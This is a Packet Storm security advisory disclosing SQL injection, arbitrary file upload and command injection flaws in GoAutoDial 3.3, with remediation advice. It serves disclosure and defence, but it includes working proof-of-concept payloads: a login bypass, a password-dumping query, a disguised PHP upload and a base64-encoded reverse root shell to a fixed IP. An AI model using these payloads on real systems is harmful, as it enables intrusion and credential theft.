what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GoAutoDial SQL Injection / Command Execution / File Upload

GoAutoDial SQL Injection / Command Execution / File Upload
Posted Apr 21, 2015

GoAutoDial versions 3.3-1406088000 and below suffer from arbitrary file upload, command injection, and remote SQL injection vulnerabilities.

tags | exploit, remote, arbitrary, vulnerability, sql injection, file upload
advisories | CVE-2015-2842, CVE-2015-2843, CVE-2015-2844, CVE-2015-2845
SHA-256 | 7256456084495a4dbe3a66cfe151aa2d0781d6b24ed4d1d7335c61904ecd970c

GoAutoDial SQL Injection / Command Execution / File Upload

Change Mirror Download
Affected software: GoAutoDial
Affected version: 3.3-1406088000 (GoAdmin) and previous releases of GoAutodial 3.3
Associated CVEs: CVE-2015-2842, CVE-2015-2843, CVE-2015-2844, CVE-2015-2845
Vendor advisory: http://goautodial.org/news/21

Abstract:
Multiple vulnerabilties exist in the GoAutodial 3.3 open source call centre software that will lead to a complete compromise of the underlying database and infrastructure.

Given that multiple product updates were released during testing that do not include any code changes related to the described vulnerabilities, any version between 3.3-1406088000 and 3.3-1421902800 might also be vulnerable.
Refer to the product changelog.txt: https://github.com/goautodial/ce-www/blob/master/changelog.txt

==================================
1/ CVE-2015-2843
- SQLi authentication bypass due to lack of input sanitisation
Affected file: go_login.php
Issue: Lack of input sanitisation on input parameters user_name and user_pass prior to being handled by the database.

A simple 'OR '1'='1 in the password field with a username of 'admin' will log you in. (assuming the default administrator user has not been removed).
You can also test this by performing the following GET request:

PoC:
https://<ip>/go_login/validate_credentials/admin/' OR '1'='1

- SQLi within the 'go_get_user_info' function
Affected file: go_site.php
Issue: Lack of input sanitisation on input parameters being handled by the database

This function returns a single entry from the db that contains user information including the username and password.
Given that the first 'active' user in the db would most likely be the admin user you can search for active=Y. There is a column in the vicidial_users table that identifies whether a user is active (Y) or not active (N).
Given this, you can perform the following to return an admin user's account username and password.

PoC:
https://<ip>/index.php/go_site/go_get_user_info/' or active='Y

==================================
2/ CVE-2015-2842
- Arbitrary file upload within the 'audiostore' upload functionality
Affected file: go_audiostore.php
Issue: Filename extensions are not properly checked to ensure only 'audio' files can be uploaded

A user can upload a file with the filename 'bogus.wav.php'. The filename is checked for the '.wav' extension and the check is passed, however with the trailing '.php' file extension, much fun is obtained.
An uploaded file is moved to a symlinked directory (/var/lib/asterisk/sounds) of which can be viewed directly from the browser.
Note*: All user uploaded files are given the 'go_' prefix. This example ends up with 'go_bogus.wav.php' as an uploaded file.

https://<ip>/sounds/go_bogus.wav.php
** Pop goes the shell **

==================================
3/ CVE-2015-2844 and CVE-2015-2845
- Arbitrary command injection via the cpanel function due to lack of input sanitisation
Affected file: go_site.php
Issue: User supplied parameters are passed to the php 'exec' function, of which the intended function can be escaped to do more sinister things.

Two variables are passed to the underlying exec command, $action and $type. Either one can be used.
URI looks like this: https://<ip>/index.php/go_site/cpanel/$type/$action

Affected code: exec("/usr/share/goautodial/goautodialc.pl '/sbin/service $type ".strtolower($action)."'");

Base64 encoding bypasses any web server encoding and a lovely root shell is obtained.
** pop goes a root shell **
reverse bash shell one liner: bash -i >& /dev/tcp/192.168.0.11/4444 0>&1

PoC:
https://<ip>/index.php/go_site/cpanel/|| bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode\`"

==================================
Vulnerability Remediation

Upgrade to version 3.3-1421902800 at a minimum.
As per the vendor advisory, follow the instructions provided in the link below.
http://goautodial.org/projects/goautodialce/wiki/GIThub

Metasploit module to be created at some point though quick and dirty python scripts work just fine too...
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close